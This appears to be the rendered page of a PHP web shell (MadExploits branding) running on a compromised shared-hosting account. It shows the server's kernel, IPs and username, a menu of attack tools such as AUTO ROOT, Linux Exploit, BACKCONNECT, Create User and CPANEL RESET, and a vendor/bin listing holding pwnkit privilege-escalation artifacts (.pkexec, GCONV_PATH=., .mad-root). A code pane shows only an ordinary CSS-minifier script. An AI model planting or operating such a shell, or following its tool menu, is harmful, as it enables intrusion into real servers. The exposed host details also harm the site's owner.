Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
doctrine
51
B
-rw----r--
doctrine-dbal
66
B
-rw----r--
minifycss
1.25
KB
-rw----r--
minifyjs
1.25
KB
-rw----r--
php-parse
6.1
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
security-checker
1.02
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : minifycss
#!/usr/bin/env php <?php use MatthiasMullie\Minify; // command line utility to minify CSS if (file_exists(__DIR__ . '/../../../autoload.php')) { // if composer install require_once __DIR__ . '/../../../autoload.php'; } else { require_once __DIR__ . '/../src/Minify.php'; require_once __DIR__ . '/../src/CSS.php'; require_once __DIR__ . '/../src/Exception.php'; } error_reporting(E_ALL); // check PHP setup for cli arguments if (!isset($_SERVER['argv']) && !isset($argv)) { fwrite(STDERR, 'Please enable the "register_argc_argv" directive in your php.ini' . PHP_EOL); exit(1); } elseif (!isset($argv)) { $argv = $_SERVER['argv']; } // check if path to file given if (!isset($argv[1])) { fwrite(STDERR, 'Argument expected: path to file' . PHP_EOL); exit(1); } // check if script run in cli environment if ('cli' !== php_sapi_name()) { fwrite(STDERR, $argv[1] . ' must be run in the command line' . PHP_EOL); exit(1); } // check if source file exists if (!file_exists($argv[1])) { fwrite(STDERR, 'Source file "' . $argv[1] . '" not found' . PHP_EOL); exit(1); } try { $minifier = new Minify\CSS($argv[1]); echo $minifier->minify(); } catch (Exception $e) { fwrite(STDERR, $e->getMessage(), PHP_EOL); exit(1); }
Close